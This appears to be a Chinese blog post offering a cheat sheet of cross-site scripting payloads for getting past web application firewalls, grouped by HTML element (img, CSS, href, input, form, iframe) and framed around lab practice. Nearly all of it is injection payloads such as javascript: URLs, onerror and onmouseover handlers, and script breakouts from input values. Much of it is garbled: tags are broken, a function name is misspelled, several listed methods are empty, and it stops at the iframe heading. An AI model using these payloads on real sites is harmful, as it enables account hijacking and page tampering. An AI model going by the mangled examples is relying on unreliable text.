XSS的Waf绕过及工具使用(附靶场通关记录,持续更新)

一、常用payload

1、echo


echo "";
?>

2、img标签


<IMG SRC=javascript:alert(String.formCharCode(88,83,83))>
<img scr="URL" style='Xss:expression(alert(xss));'>
<img src="x" onerror=alert(1)>


3、CSS

<img STYLE="background-image:url(javascript:alert('XSS'))">

4、href

标准格式
<a href="https://www.baidu.com">baidua>
XSS利用方式1
<a href="javascript:alert('xss')">aaa>
 aaa>
 <a href="javascript:aaa" onmouseover="alert(/xss/)">aaa>
 XSS利用方式2
<script>alert('xss')script>
  aaa>
XSS利用方式3
aaa>
XSS利用方式4
aaa>

5、form标签

XSS利用方式1
XSS利用方式2

6、input标签

标准格式
<input name="name" value="">
利用方式1

利用方式2

利用方式4
<input name="name" value=""><script>alert('xss')script>

7、iframe标签

XSS利用方式1